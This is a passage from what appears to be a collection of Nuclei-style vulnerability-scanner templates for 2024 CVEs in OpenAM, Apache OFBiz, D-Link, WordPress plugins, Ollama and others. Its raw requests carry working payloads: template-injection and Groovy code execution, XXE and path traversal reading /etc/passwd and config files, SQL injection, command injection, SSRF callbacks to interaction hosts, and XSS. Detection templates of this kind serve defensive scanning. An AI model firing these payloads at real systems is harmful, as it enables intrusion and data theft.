OpenAM\",\"infoText\":[\"\",\"\"],\"callbacks\":[{\"type\":\"NameCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"User Name:\"}],\"input\":[{\"name\":\"IDToken1\",\"value\":\"{{username}}\"}]},{\"type\":\"PasswordCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"Password:\"}],\"input\":[{\"name\":\"IDToken2\",\"value\":\"{{password}}\"}]}]}\n"],"matchers":[{"type":"word","part":"body","words":["tokenId"]}],"extractors":[{"type":"kval","name":"csrf","part":"header","internal":true,"kval":["iPlanetDirectoryPro"]}]},{"raw":["GET /openam/realm/RMRealm?RMRealm.tblDataActionHref=/&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession1","part":"body","group":1,"regex":["jato.pageSession=(.*?)\""]}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tabCommon.TabHref=186&jato.pageSession={{pageSession1}}&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession2","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\njato.defaultCommand=%2Fg&jato.pageSession={{pageSession2}}\n"],"extractors":[{"type":"regex","name":"pageSession3","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\n&Agents.tfFilter=*&Agents.tblSearch.PrimarySortNameHiddenField=tblDataName&Agents.tblSearch.PrimarySortOrderHiddenField=ascending&Agents.tblSearch.SecondarySortNameHiddenField=&Agents.tblSearch.SecondarySortOrderHiddenField=&Agents.tblSearch.AdvancedSortNameHiddenField=&Agents.tblSearch.AdvancedSortOrderHiddenField=&Agents.tblButtonAdd=New...&Agents.tblButtonDelete.DisabledHiddenField=true&Agents.tblSearch.SelectionCheckbox0.jato_boolean=false&Agents.tblDataUniversalName=id%3Dou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&Agents.tfGroupFilter=*&Agents.tblSearchGroup.PrimarySortNameHiddenField=tblDataGroupName&Agents.tblSearchGroup.PrimarySortOrderHiddenField=ascending&Agents.tblSearchGroup.SecondarySortNameHiddenField=&Agents.tblSearchGroup.SecondarySortOrderHiddenField=&Agents.tblSearchGroup.AdvancedSortNameHiddenField=&Agents.tblSearchGroup.AdvancedSortOrderHiddenField=&Agents.tblButtonGroupDelete.DisabledHiddenField=true&jato.defaultCommand=%2FbtnSearch&jato.pageSession={{pageSession3}}\n"],"extractors":[{"type":"regex","name":"pageSession4","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/AgentAdd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nAgentAdd.button1=Create&AgentAdd.tfName={{randstr}}&AgentAdd.tfPassword=test&AgentAdd.tfPasswordConfirm=test&jato.defaultCommand=%2Fbutton1&jato.pageSession={{pageSession4}}\n"],"extractors":[{"type":"regex","name":"pageSession5","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tblDataActionHref=id%3D{{randstr}}%2Cou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&jato.pageSession={{pageSession2}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession6","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/GenericAgentProfile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nGenericAgentProfile.button1=+Save+&GenericAgentProfile.agentgroup=&GenericAgentProfile.sunIdentityServerDeviceStatus=Active&GenericAgentProfile.userpassword=&GenericAgentProfile.userpassword_confirm=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientType=Confidential&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.listbox=https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.selectedTextField=https%3A%2F%2Fgithub.com%09https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.listbox=employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=employeenumber%09employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.selectedTextField=code%09code%09token%09token%09id_token%09id_token%09code+token%09code+token%09token+id_token%09token+id_token%09code+id_token%09code+id_token%09code+token+id_token%09code+token+id_token&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.tokenEndPointAuthMethod=client_secret_basic&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwksURI=http%3A%2F%2Fkubernetes.docker.internal%3A8081%2Fopenam%2Foauth2%2Fconnect%2Fjwk_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwks=&GenericAgentProfile.com.forgerock.openam.oauth2provider.sectorIdentifierURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.subjectType=Public&GenericAgentProfile.com.forgerock.openam.oauth2provider.idTokenSignedResponseAlg=HS256&GenericAgentProfile.idTokenEncryptionEnabled.jato_boolean=false&GenericAgentProfile.idTokenEncryptionAlgorithm=RSA1_5&GenericAgentProfile.idTokenEncryptionMethod=A128CBC-HS256&GenericAgentProfile.idTokenPublicEncryptionKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessToken=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientSessionURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientJwtPublicKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAge=600&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAgeEnabled.jato_boolean=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.publicKeyLocation=jwks_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.authorizationCodeLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.refreshTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwtTokenLifeTime=0&GenericAgentProfile.isConsentImplied.jato_boolean=false&jato.pageSession={{pageSession6}}\n"],"matchers":[{"type":"word","part":"body","words":["<div class=\"AlrtMsgTxt\">Profile was updated.</div>"]}]},{"raw":["POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\nConnection: keep-alive\n\n{}\n"],"matchers":[{"type":"word","part":"body","words":["message","reason","code"],"condition":"and"}]},{"raw":["PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\n\n{\"advancedOAuth2Config\":{\"customLoginUrlTemplate\":\"<#assign value=\\\"freemarker.template.utility.Execute\\\"?new()>${value(\\\"head -n 1 /etc/passwd\\\")}\"},\"deviceCodeConfig\":{\"completionUrl\":\"\",\"verificationUrl\":\"\",\"devicePollInterval\":5,\"deviceCodeLifetime\":300},\"oidcSsoProviderEnabled\":false,\"_id\":\"\",\"_type\":{\"_id\":\"oauth-oidc\",\"name\":\"OAuth2 Provider\",\"collection\":false}}\n"],"matchers":[{"type":"word","part":"body","words":["advancedOAuth2Config","customLoginUrlTemplate"],"condition":"and"}]},{"raw":["GET /openam/oauth2/realms/root/authorize?client_id={{randstr}}&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf={{csrf}}&max_age=200 HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"matchers":[{"type":"dsl","dsl":["contains(urldecode(location),\"root:x:0:0:\")"]}]}]},{"id":"CVE-2024-6893","info":{"name":"Journyx - XML External Entities Injection (XXE)","severity":"high"},"requests":[{"raw":["POST /jtcgi/soap_cgi.pyc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///etc/passwd\">]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalid password for user"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2330","info":{"name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","severity":"medium"},"requests":[{"raw":["POST /protocol/index.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njsoncontent={\"protocolType\":\"addmacbind\",\"messagecontent\":[\"{\\\"BandIPMacId\\\":\\\"1\\\",\\\"IPAddr\\\":\\\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\\\",\\\"MacAddr\\\":\\\"\\\",\\\"DestIP\\\":\\\"\\\",\\\"DestMask\\\":\\\"255.255.255.0\\\",\\\"Description\\\":\\\"Sample+Description\\\"}\"]}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"XPATH syntax error:\",\"alert\") && contains(header,\"text/html\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["XPATH syntax error: '([~0-9.]+)'"]}]}]},{"id":"CVE-2024-0235","info":{"name":"EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"_user_role=administrator","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@","status\":\"good","value=","\"content\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5936","info":{"name":"PrivateGPT < 0.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/file=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-36104","info":{"name":"Apache OFBiz - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27564","info":{"name":"ChatGPT\u4e2a\u4eba\u4e13\u7528\u7248 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd","{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"image/jpeg\")","regex('root:.*:0:0:', body)"],"condition":"and"},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"image/jpeg\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-20440","info":{"name":"Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials","severity":"high"},"requests":[{"raw":["GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["csluev.log"]},{"type":"word","part":"content_type","words":["text/x-log"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4257","info":{"name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>\u4e34\u5e8a\u6d4f\u89c8</title>\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32113","info":{"name":"Apache OFBiz Directory Traversal - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["java.lang.Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6587","info":{"name":"LiteLLM - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /chat/completions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"model\": \"command-nightly\",\n  \"messages\": [\n    {\n      \"content\": \"Hello, how are you?\",\n      \"role\": \"user\"\n    }\n  ],\n  \"api_base\": \"https://{{interactsh-url}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["Bearer"]}]}]},{"id":"CVE-2024-1212","info":{"name":"Progress Kemp LoadMaster - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/access/set?param=enableapi&value=1"],"headers":{"Authorization":"Basic JztsczsnOmRvZXNub3RtYXR0ZXI="},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bin","mnt","WWW-Authenticate: Basic"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6924","info":{"name":"TrueBooker <= 1.0.2 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/truebooker-appointment-booking\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntba_service_id=(SLEEP(6))\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-37032","info":{"name":"Ollama - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/pull HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n","POST /api/push HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')"],"condition":"and"}]}]},{"id":"CVE-2024-6366","info":{"name":"User Profile Builder < 3.11.8 - File Upload","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/plugins/profile-builder\")"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"wppb_upload\"\n\ntrue\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"meta_name\"\n\n{{filename}}.gif\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"_wpnonce\"\n\ne8\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{filename}}.gif\"\nContent-Type: image/jpeg\n\nGIF89a\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"id\"","\"uploadedTo\""],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4439","info":{"name":"WordPress Core <6.5.2 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/post-new.php HTTP/1.1\nHost: {{Hostname}}\n","POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-HTTP-Method-Override: PUT\nX-WP-Nonce: {{post_nonce}}\n\n{\"id\":{{postid}},\"title\":\"CVE-2024-4439\",\"content\":\"<!-- wp:avatar {\\\"isLink\\\":true,\\\"linkTarget\\\":\\\"_blank\\\"} /-->\",\"status\":\"publish\"}\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{profile_nonce}}&first_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&last_name=&nickname=admin&display_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=admin%40gmail.com&action=update&user_id={{userid}}&submit=Update+Profile\n","GET wp-login.php?action=logout&_wpnonce={{logout_nonce}} HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncomment=Unauthenticated+Comment&author=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=example%40gmail.com&url=example.com&submit=Post+Comment&comment_post_ID={{postid}}\n","GET /?p={{postid}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body_9","words":["aria-label=\"(\" onmouseover=alert(document.domain);"]},{"type":"word","part":"header_9","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"userid","part":"body_2","group":1,"internal":true,"regex":["user_id=(\\d+)"]},{"type":"regex","name":"logout_nonce","part":"body_2","group":2,"internal":true,"regex":["action=logout&(.*);\\_wpnonce=(.{10})"]},{"type":"regex","name":"postid","part":"body_3","group":1,"internal":true,"regex":["post=(\\d+)"]},{"type":"regex","name":"post_nonce","part":"body_3","group":1,"internal":true,"regex":["createNonceMiddleware\\(\\s\"(.*)\\\"\\s\\)"]},{"type":"regex","name":"profile_nonce","part":"body_5","group":1,"internal":true,"regex":["name=\\\"\\_wpnonce\\\"\\svalue=\"(.{10})\\\"\\s"]}]}]},{"id":"CVE-2024-7332","info":{"name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_cste/cgi-bin/product.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"[PRODUCT]\",\"[WLAN]\",\"HostName\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-31849","info":{"name":"CData Connect < 23.4.8846 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData - Connect"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3234","info":{"name":"Chuanhu Chat - Directory Traversal","severity":"critical"},"requests":[{"raw":["GET /file=web_assets/../config.json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"openai_api_key\":","\"openai_api_type\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33113","info":{"name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<service>DEVICE.ACCOUNT</service>","<seqno>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36412","info":{"name":"SuiteCRM - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_any(body, \"You have already responded to the invitation or there\", \"Thank you for accepting\")"],"condition":"and"}]}]},{"id":"CVE-2024-10914","info":{"name":"D-Link NAS - Command Injection via Name Parameter","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["id","ifconfig"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)","contains_all(body, 'inet addr:', 'Mask:')"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"Content-type: text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-8877","info":{"name":"Riello Netman 204 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"START APPLICATION\", \"category\\\":\", \"codeStr\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38473","info":{"name":"Apache HTTP Server - ACL Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{files}}"],"payloads":{"files":["admin.php","adminer.php","xmlrpc.php",".env","admin.php","php-info.php","php_info.php","phpinfo.php","info.php","adminer.php","xmlrpc.php","bin/cron.php","cache/index.tpl.php","cpanel.php"]},"stop-at-first-match":true,"matchers":[{"type":"status","status":[403,401],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/{{http_1_files}}%3ftest.php"],"matchers":[{"type":"status","status":[200]}]},{"method":"GET","path":["{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"],"matchers":[{"type":"word","words":["On Debian systems, the complete text of the GNU General Public License","This package was written by Peter Tobias"],"condition":"and"}]}]},{"id":"CVE-2024-8752","info":{"name":"WebIQ 2.15.9 - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts]\",\"extensions]\")","contains(content_type,\"image/svg+xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4434","info":{"name":"LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2 >= 6","status_code_2 == 200","contains(content_type,\"application/json\")","contains_all(body_2,\"No courses were found\",\"success\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"is_course_archive\""],"internal":true}]}]},{"id":"CVE-2024-0195","info":{"name":"SpiderFlow Crawler Platform - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SPIDER_FLOW_VERSION"]}]},{"raw":["POST /function/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; 